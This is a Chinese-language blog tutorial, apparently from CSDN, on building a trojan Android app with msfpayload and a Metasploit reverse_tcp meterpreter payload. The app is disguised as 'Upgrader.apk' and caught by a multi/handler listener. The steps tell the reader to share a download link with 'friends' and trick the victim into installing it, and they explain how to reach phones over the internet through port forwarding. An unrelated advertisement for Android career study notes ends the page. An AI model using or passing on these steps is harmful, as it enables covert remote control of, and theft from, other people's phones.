第 1 步:打开 Kali Linux

  • 打开一个终端,制作一个木马.apk
  • 您可以通过键入以下内容来执行此操作:
  • msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (把LHOST换成你自己的IP)
  • 您还可以通过 Interet在 LHOST 中使用您的公共/外部 IP和端口转发来破解 WAN 上的 android (如果您在评论部分有问题,请问我关于端口转发的问题)

第 2 步:打开另一个终端

  • 打开另一个终端,直到生成文件。
  • 加载 metasploit 控制台,输入:msfconsole

在这里插入图片描述

第 3 步:设置监听器

  • 加载后(这需要时间),通过键入以下内容加载多处理程序漏洞利用:use exploit/multi/handler

在这里插入图片描述

  • 通过键入以下内容设置(反向)有效载荷:set payload android/meterpreter/reverse_tcp
  • 设置 L 主机类型:设置LHOST 192.168.0.4

在这里插入图片描述

第 4 步:利用

  • 最后输入:exploit启动监听器。
  • 将您制作的应用程序 (Upgrader.apk) 从根文件夹复制到您的 Android 手机。

在这里插入图片描述

  • 然后使用上传到 Dropbox 或任何共享网站(例如:www.speedyshare.com)将其发送。
  • 然后将网站给你的链接发送给你的朋友并利用他们的手机(仅限局域网,但如果你使用 WAN 方法,那么你可以在互联网上的任何地方使用漏洞)

在这里插入图片描述

  • 让受害者安装 Upgrader 应用程序(因为他认为这是为了升级他手机上的某些功能)
  • 但是,应从 Android 手机的安全设置中启用(如果未启用)允许安装来自未知来源的应用程序选项,以允许安装木马。
  • 当他点击打开时……

第 5 步:

出现meterpreter提示:

在这里插入图片描述

最后

如果想要成为架构师或想突破20~30K薪资范畴,那就不要局限在编码,业务,要会选型、扩展,提升编程思维。此外,良好的职业规划也很重要,学习的习惯很重要,但是最重要的还是要能持之以恒,任何不能坚持落实的计划都是空谈。

如果你没有方向,这里给大家分享一套由阿里高级架构师编写的《Android八大模块进阶笔记》,帮大家将杂乱、零散、碎片化的知识进行体系化的整理,让大家系统而高效地掌握Android开发的各个知识点。
在这里插入图片描述
相对于我们平时看的碎片化内容,这份笔记的知识点更系统化,更容易理解和记忆,是严格按照知识体系编排的。

全套视频资料:

一、面试合集

在这里插入图片描述
二、源码解析合集
在这里插入图片描述

三、开源框架合集
在这里插入图片描述
欢迎大家一键三连支持,若需要文中资料,直接点击文末CSDN官方认证微信卡片免费领取↓↓↓

Logo

更多推荐